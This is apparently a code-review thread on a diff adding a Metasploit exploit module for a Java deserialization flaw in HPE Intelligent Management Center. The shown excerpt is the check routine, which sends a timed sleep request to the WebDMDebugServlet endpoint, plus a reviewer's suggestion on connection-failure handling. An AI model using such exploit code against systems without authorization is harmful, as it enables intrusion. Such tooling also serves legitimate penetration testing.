modules/exploits/windows/http/hp_imc_java_deserialize.rb

```diff
@@ -0,0 +1,137 @@
+
+    print_status 'Attempting to verify vulnerability by sending synchronous sleep command...'
+    t1 = Time.now.to_i
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, 'topo', 'WebDMDebugServlet'),
+      'data'     => data
+    })
+    t2 = Time.now.to_i
+
+    diff = t2 - t1
+    if res && res.code == 500 && res.body.include?('HPE Intelligent Management Center') && diff >= 10
```

Comment:
As this `if/else` branch starts with `if res`, the `else` will trigger in the event that the network connection fails. Is that the expected behavior?

Alternatively, would something like this make sense?

```suggestion
    unless res
      vprint_error 'Connection failed'
      return CheckCode::Detected
    end
    
    if res.code == 500 && res.body.include?('HPE Intelligent Management Center') && diff >= 10
```